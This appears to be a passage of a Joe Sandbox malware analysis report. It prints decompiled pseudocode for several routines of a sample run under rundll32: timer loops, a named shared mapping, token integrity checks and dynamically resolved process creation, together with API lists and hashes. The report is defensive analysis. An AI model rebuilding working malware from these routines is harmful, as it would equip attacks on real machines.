                                • Opcode Fuzzy Hash: 3ec798d144c1be9514536a1ebd7dfd76b174ea916cb9823d5bd9646609afca64
                                • Instruction Fuzzy Hash: E4812B71A00305EFEB61CF98D984BADB7F9BB48310F10846AF985EB251E775E944CB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 139 106661d-106664f memset CreateWaitableTimerA 140 1066655-10666ae _allmul SetWaitableTimer WaitForMultipleObjects 139->140 141 10667d0-10667d6 GetLastError 139->141 143 10666b4-10666b7 140->143 144 1066738-106673e 140->144 142 10667da-10667e4 141->142 145 10666c2 143->145 146 10666b9 call 106216c 143->146 147 106673f-1066743 144->147 151 10666cc 145->151 153 10666be-10666c0 146->153 149 1066745-106674d RtlFreeHeap 147->149 150 1066753-1066757 147->150 149->150 150->147 154 1066759-1066763 CloseHandle 150->154 152 10666d0-10666d5 151->152 155 10666d7-10666de 152->155 156 10666e8-1066715 call 10643eb 152->156 153->145 153->151 154->142 155->156 157 10666e0 155->157 160 1066717-1066722 156->160 161 1066765-106676a 156->161 157->156 160->152 164 1066724-106672f call 10670d8 160->164 162 106676c-1066772 161->162 163 1066789-1066791 161->163 162->144 165 1066774-1066787 call 106561e 162->165 166 1066797-10667c5 _allmul SetWaitableTimer WaitForMultipleObjects 163->166 170 1066734 164->170 165->166 166->152 169 10667cb 166->169 169->144 170->144
                                C-Code - Quality: 83%
                                			E0106661D(void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                				void _v48;
                                				long _v52;
                                				struct %anon52 _v60;
                                				char _v72;
                                				long _v76;
                                				void* _v80;
                                				union _LARGE_INTEGER _v84;
                                				struct %anon52 _v92;
                                				void* _v96;
                                				void* _v100;
                                				union _LARGE_INTEGER _v104;
                                				long _v108;
                                				struct %anon52 _v124;
                                				long _v128;
                                				struct %anon52 _t46;
                                				void* _t51;
                                				long _t53;
                                				void* _t54;
                                				struct %anon52 _t61;
                                				long _t65;
                                				struct %anon52 _t66;
                                				intOrPtr _t68;
                                				void* _t69;
                                				void* _t73;
                                				signed int _t74;
                                				void* _t76;
                                				void* _t78;
                                				void** _t82;
                                				signed int _t86;
                                				void* _t89;
                                
                                				_t76 = __edx;
                                				_v52 = 0;
                                				memset( &_v48, 0, 0x2c);
                                				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
                                				_t46 = CreateWaitableTimerA(0, 1, 0);
                                				_v60 = _t46;
                                				if(_t46 == 0) {
                                					_v92.HighPart = GetLastError();
                                				} else {
                                					_push(0xffffffff);
                                					_push(0xff676980);
                                					_push(0);
                                					_push( *0x106a2e0);
                                					_v76 = 0;
                                					_v80 = 0;
                                					L0106824A();
                                					_v84.LowPart = _t46;
                                					_v80 = _t76;
                                					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
                                					_t51 =  *0x106a30c; // 0x2cc
                                					_v76 = _t51;
                                					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
                                					_v108 = _t53;
                                					if(_t53 == 0) {
                                						if(_a8 != 0) {
                                							L4:
                                							 *0x106a2ec = 5;
                                						} else {
                                							_t69 = E0106216C(_t76); // executed
                                							if(_t69 != 0) {
                                								goto L4;
                                							}
                                						}
                                						_v104.LowPart = 0;
                                						L6:
                                						L6:
                                						if(_v104.LowPart == 1 && ( *0x106a300 & 0x00000001) == 0) {
                                							_v104.LowPart = 2;
                                						}
                                						_t74 = _v104.LowPart;
                                						_t58 = _t74 << 4;
                                						_t78 = _t89 + (_t74 << 4) + 0x38;
                                						_t75 = _t74 + 1;
                                						_v92.LowPart = _t74 + 1;
                                						_t61 = E010643EB( &_v96, _t75, _t89 + _t58 + 0x38, _t78,  &_v100); // executed
                                						_v124 = _t61;
                                						if(_t61 != 0) {
                                							goto L17;
                                						}
                                						_t66 = _v92;
                                						_v104.LowPart = _t66;
                                						if(_t66 != 3) {
                                							goto L6;
                                						} else {
                                							_t68 = E010670D8(_t75,  &_v72, _a4, _a8); // executed
                                							_v124.HighPart = _t68;
                                						}
                                						goto L12;
                                						L17:
                                						__eflags = _t61 - 0x10d2;
                                						if(_t61 != 0x10d2) {
                                							_push(0xffffffff);
                                							_push(0xff676980);
                                							_push(0);
                                							_push( *0x106a2e4);
                                							goto L21;
                                						} else {
                                							__eflags =  *0x106a2e8; // 0x0
                                							if(__eflags == 0) {
                                								goto L12;
                                							} else {
                                								_t61 = E0106561E();
                                								_push(0xffffffff);
                                								_push(0xdc3cba00);
                                								_push(0);
                                								_push( *0x106a2e8);
                                								L21:
                                								L0106824A();
                                								_v104.LowPart = _t61;
                                								_v100 = _t78;
                                								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
                                								_t65 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
                                								_v128 = _t65;
                                								__eflags = _t65;
                                								if(_t65 == 0) {
                                									goto L6;
                                								} else {
                                									goto L12;
                                								}
                                							}
                                						}
                                						L25:
                                					}
                                					L12:
                                					_t82 =  &_v72;
                                					_t73 = 3;
                                					do {
                                						_t54 =  *_t82;
                                						if(_t54 != 0) {
                                							RtlFreeHeap( *0x106a2d8, 0, _t54); // executed
                                						}
                                						_t82 =  &(_t82[4]);
                                						_t73 = _t73 - 1;
                                					} while (_t73 != 0);
                                					CloseHandle(_v80);
                                				}
                                				return _v92.HighPart;
                                				goto L25;
                                			}

































                                0x0106661d
                                0x01066633
                                0x01066637
                                0x0106663c
                                0x01066643
                                0x01066649
                                0x0106664f
                                0x010667d6
                                0x01066655
                                0x01066655
                                0x01066657
                                0x0106665c
                                0x0106665d
                                0x01066663
                                0x01066667
                                0x0106666b
                                0x01066679
                                0x01066687
                                0x0106668b
                                0x0106668d
                                0x0106669a
                                0x010666a6
                                0x010666a8
                                0x010666ae
                                0x010666b7
                                0x010666c2
                                0x010666c2
                                0x010666b9
                                0x010666b9
                                0x010666c0
                                0x00000000
                                0x00000000
                                0x010666c0
                                0x010666cc
                                0x00000000
                                0x010666d0
                                0x010666d5
                                0x010666e0
                                0x010666e0
                                0x010666e8
                                0x010666ee
                                0x010666f6
                                0x010666ff
                                0x01066706
                                0x0106670a
                                0x0106670f
                                0x01066715
                                0x00000000
                                0x00000000
                                0x01066717
                                0x0106671b
                                0x01066722
                                0x00000000
                                0x01066724
                                0x0106672f
                                0x01066734
                                0x01066734
                                0x00000000
                                0x01066765
                                0x01066765
                                0x0106676a
                                0x01066789
                                0x0106678b
                                0x01066790
                                0x01066791
                                0x00000000
                                0x0106676c
                                0x0106676c
                                0x01066772
                                0x00000000
                                0x01066774
                                0x01066774
                                0x01066779
                                0x0106677b
                                0x01066780
                                0x01066781
                                0x01066797
                                0x01066797
                                0x0106679f
                                0x010667ad
                                0x010667b1
                                0x010667bd
                                0x010667bf
                                0x010667c3
                                0x010667c5
                                0x00000000
                                0x010667cb
                                0x00000000
                                0x010667cb
                                0x010667c5
                                0x01066772
                                0x00000000
                                0x0106676a
                                0x01066738
                                0x0106673a
                                0x0106673e
                                0x0106673f
                                0x0106673f
                                0x01066743
                                0x0106674d
                                0x0106674d
                                0x01066753
                                0x01066756
                                0x01066756
                                0x0106675d
                                0x0106675d
                                0x010667e4
                                0x00000000

                                APIs
                                • memset.NTDLL ref: 01066637
                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 01066643
                                • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 0106666B
                                • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 0106668B
                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,01063EE8,?), ref: 010666A6
                                • RtlFreeHeap.NTDLL(00000000,00000000,?,?,?,?,?,?,?,?,?,?,01063EE8,?,00000000), ref: 0106674D
                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,01063EE8,?,00000000,?,?), ref: 0106675D
                                • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 01066797
                                • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?), ref: 010667B1
                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 010667BD
                                  • Part of subcall function 0106216C: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05109400,00000000,?,76DDF710,00000000,76DDF730), ref: 010621BB
                                  • Part of subcall function 0106216C: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05109438,?,00000000,30314549,00000014,004F0053,051093F4), ref: 01062258
                                  • Part of subcall function 0106216C: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,010666BE), ref: 0106226A
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,01063EE8,?,00000000,?,?), ref: 010667D0
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                • String ID:
                                • API String ID: 3521023985-0
                                • Opcode ID: ddaf35da02c5726d98f09da6d7070611f886793d167d8cf7ee6fab1dd499f161
                                • Instruction ID: 25db390838c1e876a0b7f17683517bc5b1411e972b53c46563dc1cea842f44c0
                                • Opcode Fuzzy Hash: ddaf35da02c5726d98f09da6d7070611f886793d167d8cf7ee6fab1dd499f161
                                • Instruction Fuzzy Hash: A2517C71109321AFD761AF19DC449ABBBECFF89324F008A1AF4D5D2160D7769504CFA2
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 74%
                                			E010676BB(intOrPtr __edx, void** _a4, void** _a8) {
                                				intOrPtr _v8;
                                				struct _FILETIME* _v12;
                                				short _v56;
                                				struct _FILETIME* _t12;
                                				intOrPtr _t13;
                                				void* _t17;
                                				void* _t21;
                                				intOrPtr _t27;
                                				long _t28;
                                				void* _t30;
                                
                                				_t27 = __edx;
                                				_t12 =  &_v12;
                                				GetSystemTimeAsFileTime(_t12);
                                				_push(0x192);
                                				_push(0x54d38000);
                                				_push(_v8);
                                				_push(_v12);
                                				L01068244();
                                				_push(_t12);
                                				_v12 = _t12;
                                				_t13 =  *0x106a348; // 0x409d5a8
                                				_t5 = _t13 + 0x106b87a; // 0x5108e22
                                				_t6 = _t13 + 0x106b594; // 0x530025
                                				_push(0x16);
                                				_push( &_v56);
                                				_v8 = _t27;
                                				L01067EAA();
                                				_t17 = CreateFileMappingW(0xffffffff, 0x106a34c, 4, 0, 0x1000,  &_v56); // executed
                                				_t30 = _t17;
                                				if(_t30 == 0) {
                                					_t28 = GetLastError();
                                				} else {
                                					if(GetLastError() == 0xb7) {
                                						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                                						if(_t21 == 0) {
                                							_t28 = GetLastError();
                                							if(_t28 != 0) {
                                								goto L6;
                                							}
                                						} else {
                                							 *_a4 = _t30;
                                							 *_a8 = _t21;
                                							_t28 = 0;
                                						}
                                					} else {
                                						_t28 = 2;
                                						L6:
                                						CloseHandle(_t30);
                                					}
                                				}
                                				return _t28;
                                			}













                                0x010676bb
                                0x010676c3
                                0x010676c7
                                0x010676cd
                                0x010676d2
                                0x010676d7
                                0x010676da
                                0x010676dd
                                0x010676e2
                                0x010676e3
                                0x010676e6
                                0x010676eb
                                0x010676f2
                                0x010676fc
                                0x010676fe
                                0x010676ff
                                0x01067702
                                0x0106771e
                                0x01067724
                                0x01067728
                                0x01067776
                                0x0106772a
                                0x01067737
                                0x01067747
                                0x0106774f
                                0x01067761
                                0x01067765
                                0x00000000
                                0x00000000
                                0x01067751
                                0x01067754
                                0x01067759
                                0x0106775b
                                0x0106775b
                                0x01067739
                                0x0106773b
                                0x01067767
                                0x01067768
                                0x01067768
                                0x01067737
                                0x0106777d

                                APIs
                                • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,01063DBA,?,?,4D283A53,?,?), ref: 010676C7
                                • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 010676DD
                                • _snwprintf.NTDLL ref: 01067702
                                • CreateFileMappingW.KERNELBASE(000000FF,0106A34C,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 0106771E
                                • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,01063DBA,?,?,4D283A53,?), ref: 01067730
                                • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 01067747
                                • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,01063DBA,?,?,4D283A53), ref: 01067768
                                • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,01063DBA,?,?,4D283A53,?), ref: 01067770
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                • String ID:
                                • API String ID: 1814172918-0
                                • Opcode ID: a842d63414d2565b88c500dc10f78b624a56a2603df895dce6d61d0881c40b95
                                • Instruction ID: f3e0c51db28be7ca9dd969d9f16ddfd5f4a59db3786d0b17344a190d04bb23a3
                                • Opcode Fuzzy Hash: a842d63414d2565b88c500dc10f78b624a56a2603df895dce6d61d0881c40b95
                                • Instruction Fuzzy Hash: FE21D272640204BFE721AB68CC05F9E3BFDBB88758F200021F685E7190DA759904CB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 93%
                                			E01064274(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {
                                				void* _t17;
                                				void* _t18;
                                				void* _t19;
                                				void* _t20;
                                				void* _t21;
                                				intOrPtr _t24;
                                				void* _t37;
                                				void* _t41;
                                				intOrPtr* _t45;
                                
                                				_t41 = __edi;
                                				_t37 = __ebx;
                                				_t45 = __eax;
                                				_t16 =  *((intOrPtr*)(__eax + 0x20));
                                				if( *((intOrPtr*)(__eax + 0x20)) != 0) {
                                					E01066E40(_t16, __ecx, 0xea60);
                                				}
                                				_t17 =  *(_t45 + 0x18);
                                				_push(_t37);
                                				_push(_t41);
                                				if(_t17 != 0) {
                                					InternetSetStatusCallback(_t17, 0);
                                					InternetCloseHandle( *(_t45 + 0x18)); // executed
                                				}
                                				_t18 =  *(_t45 + 0x14);
                                				if(_t18 != 0) {
                                					InternetSetStatusCallback(_t18, 0);
                                					InternetCloseHandle( *(_t45 + 0x14));
                                				}
                                				_t19 =  *(_t45 + 0x10);
                                				if(_t19 != 0) {
                                					InternetSetStatusCallback(_t19, 0);
                                					InternetCloseHandle( *(_t45 + 0x10));
                                				}
                                				_t20 =  *(_t45 + 0x1c);
                                				if(_t20 != 0) {
                                					FindCloseChangeNotification(_t20); // executed
                                				}
                                				_t21 =  *(_t45 + 0x20);
                                				if(_t21 != 0) {
                                					CloseHandle(_t21);
                                				}
                                				_t22 =  *((intOrPtr*)(_t45 + 8));
                                				if( *((intOrPtr*)(_t45 + 8)) != 0) {
                                					E01066C2C(_t22);
                                					 *((intOrPtr*)(_t45 + 8)) = 0;
                                					 *((intOrPtr*)(_t45 + 0x30)) = 0;
                                				}
                                				_t23 =  *((intOrPtr*)(_t45 + 0xc));
                                				if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
                                					E01066C2C(_t23);
                                				}
                                				_t24 =  *_t45;
                                				if(_t24 != 0) {
                                					_t24 = E01066C2C(_t24);
                                				}
                                				_t46 =  *((intOrPtr*)(_t45 + 4));
                                				if( *((intOrPtr*)(_t45 + 4)) != 0) {
                                					return E01066C2C(_t46);
                                				}
                                				return _t24;
                                			}












                                0x01064274
                                0x01064274
                                0x01064276
                                0x01064278
                                0x0106427f
                                0x01064286
                                0x01064286
                                0x0106428b
                                0x0106428e
                                0x01064295
                                0x0106429e
                                0x010642a2
                                0x010642a7
                                0x010642a7
                                0x010642a9
                                0x010642ae
                                0x010642b2
                                0x010642b7
                                0x010642b7
                                0x010642b9
                                0x010642be
                                0x010642c2
                                0x010642c7
                                0x010642c7
                                0x010642c9
                                0x010642d4
                                0x010642d7
                                0x010642d7
                                0x010642d9
                                0x010642de
                                0x010642e1
                                0x010642e1
                                0x010642e3
                                0x010642ea
                                0x010642ed
                                0x010642f2
                                0x010642f5
                                0x010642f5
                                0x010642f8
                                0x010642fd
                                0x01064300
                                0x01064300
                                0x01064305
                                0x01064309
                                0x0106430c
                                0x0106430c
                                0x01064311
                                0x01064316
                                0x00000000
                                0x01064319
                                0x01064320

                                APIs
                                • InternetSetStatusCallback.WININET(?,00000000), ref: 010642A2
                                • InternetCloseHandle.WININET(?), ref: 010642A7
                                • InternetSetStatusCallback.WININET(?,00000000), ref: 010642B2
                                • InternetCloseHandle.WININET(?), ref: 010642B7
                                • InternetSetStatusCallback.WININET(?,00000000), ref: 010642C2
                                • InternetCloseHandle.WININET(?), ref: 010642C7
                                • FindCloseChangeNotification.KERNEL32(?,00000000,00000102,?,?,01063801,?,?,76DC81D0,00000000,00000000), ref: 010642D7
                                • CloseHandle.KERNEL32(?,00000000,00000102,?,?,01063801,?,?,76DC81D0,00000000,00000000), ref: 010642E1
                                  • Part of subcall function 01066E40: WaitForMultipleObjects.KERNEL32(00000002,01067BB5,00000000,01067BB5,?,?,?,01067BB5,0000EA60), ref: 01066E5B
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: Internet$Close$Handle$CallbackStatus$ChangeFindMultipleNotificationObjectsWait
                                • String ID:
                                • API String ID: 2172891992-0
                                • Opcode ID: a79902b35774f2fcc645ca38ff1273e008a571e779222f20ef1dd6a9116510bd
                                • Instruction ID: f2b6fea099cfba1101689dba72695540666a5758e19539d89ef7f1a57154660f
                                • Opcode Fuzzy Hash: a79902b35774f2fcc645ca38ff1273e008a571e779222f20ef1dd6a9116510bd
                                • Instruction Fuzzy Hash: 82112E76A006499BD570AFBEEC84C5BBBEDFF542103A50D58F5C5D3910C736F8588A60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 73%
                                			E0106402A(void* __eax, void* __ecx) {
                                				long _v8;
                                				char _v12;
                                				void* _v16;
                                				void* _v28;
                                				long _v32;
                                				void _v104;
                                				char _v108;
                                				long _t36;
                                				intOrPtr _t40;
                                				intOrPtr _t47;
                                				intOrPtr _t50;
                                				void* _t58;
                                				void* _t68;
                                				intOrPtr* _t70;
                                				intOrPtr* _t71;
                                
                                				_t1 = __eax + 0x14; // 0x74183966
                                				_t69 =  *_t1;
                                				_t36 = E010644DE(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16); // executed
                                				_v8 = _t36;
                                				if(_t36 != 0) {
                                					L12:
                                					return _v8;
                                				}
                                				E01067A1E( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
                                				_t40 = _v12(_v12);
                                				_v8 = _t40;
                                				if(_t40 == 0 && ( *0x106a300 & 0x00000001) != 0) {
                                					_v32 = 0;
                                					asm("stosd");
                                					asm("stosd");
                                					asm("stosd");
                                					_v108 = 0;
                                					memset( &_v104, 0, 0x40);
                                					_t47 =  *0x106a348; // 0x409d5a8
                                					_t18 = _t47 + 0x106b3f3; // 0x73797325
                                					_t68 = E01067326(_t18);
                                					if(_t68 == 0) {
                                						_v8 = 8;
                                					} else {
                                						_t50 =  *0x106a348; // 0x409d5a8
                                						_t19 = _t50 + 0x106b73f; // 0x5108ce7
                                						_t20 = _t50 + 0x106b0af; // 0x4e52454b
                                						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
                                						if(_t71 == 0) {
                                							_v8 = 0x7f;
                                						} else {
                                							_v108 = 0x44;
                                							E010623AA();
                                							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0); // executed
                                							_push(1);
                                							E010623AA();
                                							if(_t58 == 0) {
                                								_v8 = GetLastError();
                                							} else {
                                								FindCloseChangeNotification(_v28); // executed
                                								CloseHandle(_v32);
                                							}
                                						}
                                						HeapFree( *0x106a2d8, 0, _t68);
                                					}
                                				}
                                				_t70 = _v16;
                                				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
                                				E01066C2C(_t70);
                                				goto L12;
                                			}


















                                0x01064032
                                0x01064032
                                0x01064041
                                0x01064048
                                0x0106404d
                                0x0106415a
                                0x01064161
                                0x01064161
                                0x0106405c
                                0x01064064
                                0x01064067
                                0x0106406c
                                0x01064081
                                0x01064087
                                0x01064088
                                0x0106408b
                                0x01064091
                                0x01064094
                                0x01064099
                                0x010640a1
                                0x010640ad
                                0x010640b1
                                0x01064141
                                0x010640b7
                                0x010640b7
                                0x010640bc
                                0x010640c3
                                0x010640d7
                                0x010640db
                                0x0106412a
                                0x010640dd
                                0x010640de
                                0x010640e5
                                0x010640fe
                                0x01064100
                                0x01064104
                                0x0106410b
                                0x01064125
                                0x0106410d
                                0x01064116
                                0x0106411b
                                0x0106411b
                                0x0106410b
                                0x01064139
                                0x01064139
                                0x010640b1
                                0x01064148
                                0x01064151
                                0x01064155
                                0x00000000

                                APIs
                                  • Part of subcall function 010644DE: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,01064046,?,?,?,?,00000000,00000000), ref: 01064503
                                  • Part of subcall function 010644DE: GetProcAddress.KERNEL32(00000000,7243775A), ref: 01064525
                                  • Part of subcall function 010644DE: GetProcAddress.KERNEL32(00000000,614D775A), ref: 0106453B
                                  • Part of subcall function 010644DE: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 01064551
                                  • Part of subcall function 010644DE: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 01064567
                                  • Part of subcall function 010644DE: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 0106457D
                                • memset.NTDLL ref: 01064094
                                  • Part of subcall function 01067326: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,010640AD,73797325), ref: 01067337
                                  • Part of subcall function 01067326: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 01067351
                                • GetModuleHandleA.KERNEL32(4E52454B,05108CE7,73797325), ref: 010640CA
                                • GetProcAddress.KERNEL32(00000000), ref: 010640D1
                                • HeapFree.KERNEL32(00000000,00000000), ref: 01064139
                                  • Part of subcall function 010623AA: GetProcAddress.KERNEL32(36776F57,01067989), ref: 010623C5
                                • FindCloseChangeNotification.KERNEL32(00000000,00000001), ref: 01064116
                                • CloseHandle.KERNEL32(?), ref: 0106411B
                                • GetLastError.KERNEL32(00000001), ref: 0106411F
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ChangeErrorFindFreeHeapLastNotificationmemset
                                • String ID:
                                • API String ID: 186216982-0
                                • Opcode ID: e6db60736692d4e0217e3629b2d83e4f4887b14fedc15a7c712358764fd861c5
                                • Instruction ID: b3a438de976322713ee6cdd19e5345fd7da5d8c965c291e74796179b49216c79
                                • Opcode Fuzzy Hash: e6db60736692d4e0217e3629b2d83e4f4887b14fedc15a7c712358764fd861c5
                                • Instruction Fuzzy Hash: ED313CB2A00219EFEB21AFA4DC88EDEBBFCEB18344F104465F685E7121D7759A44CB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 100%
                                			E01066C41(long* _a4) {
                                				long _v8;
                                				void* _v12;
                                				void _v16;
                                				long _v20;
                                				int _t33;
                                				void* _t46;
                                
                                				_v16 = 1;
                                				_v20 = 0x2000;
                                				if( *0x106a2fc > 5) {
                                					_v16 = 0;
                                					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                                						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                                						_v8 = 0;
                                						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                                						if(_v8 != 0) {
                                							_t46 = E01066D63(_v8);
                                							if(_t46 != 0) {
                                								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                                								if(_t33 != 0) {
                                									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                                								}
                                								E01066C2C(_t46);
                                							}
                                						}
                                						CloseHandle(_v12);
                                					}
                                				}
                                				 *_a4 = _v20;
                                				return _v16;
                                			}









                                0x01066c4e
                                0x01066c55
                                0x01066c5c
                                0x01066c70
                                0x01066c7b
                                0x01066c93
                                0x01066ca0
                                0x01066ca3
                                0x01066ca8
                                0x01066cb3
                                0x01066cb7
                                0x01066cc6
                                0x01066cca
                                0x01066ce6
                                0x01066ce6
                                0x01066cea
                                0x01066cea
                                0x01066cef
                                0x01066cf3
                                0x01066cf9
                                0x01066cfa
                                0x01066d01
                                0x01066d07

                                APIs
                                • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 01066C73
                                • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 01066C93
                                • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 01066CA3
                                • CloseHandle.KERNEL32(00000000), ref: 01066CF3
                                  • Part of subcall function 01066D63: RtlAllocateHeap.NTDLL(00000000,00000000,01065D7B), ref: 01066D6F
                                • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 01066CC6
                                • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 01066CCE
                                • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 01066CDE
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                • String ID:
                                • API String ID: 1295030180-0
                                • Opcode ID: ff0202be26a023b5de472f2d1933cde935c20734cd9b8b48ef471ec8983ded32
                                • Instruction ID: 53a60db35c69beaac3bbe3440d50b89b4b5dc66b1f4e59dae309ba9e1f833288
                                • Opcode Fuzzy Hash: ff0202be26a023b5de472f2d1933cde935c20734cd9b8b48ef471ec8983ded32
                                • Instruction Fuzzy Hash: 92212875E0021DFFEB10AF94DD84EEEBBBDEB48314F0000A5FA50A6164D7769A44DB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 64%
                                			E01061D33(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                				intOrPtr _v8;
                                				intOrPtr _t9;
                                				intOrPtr _t13;
                                				char* _t19;
                                				char* _t28;
                                				void* _t33;
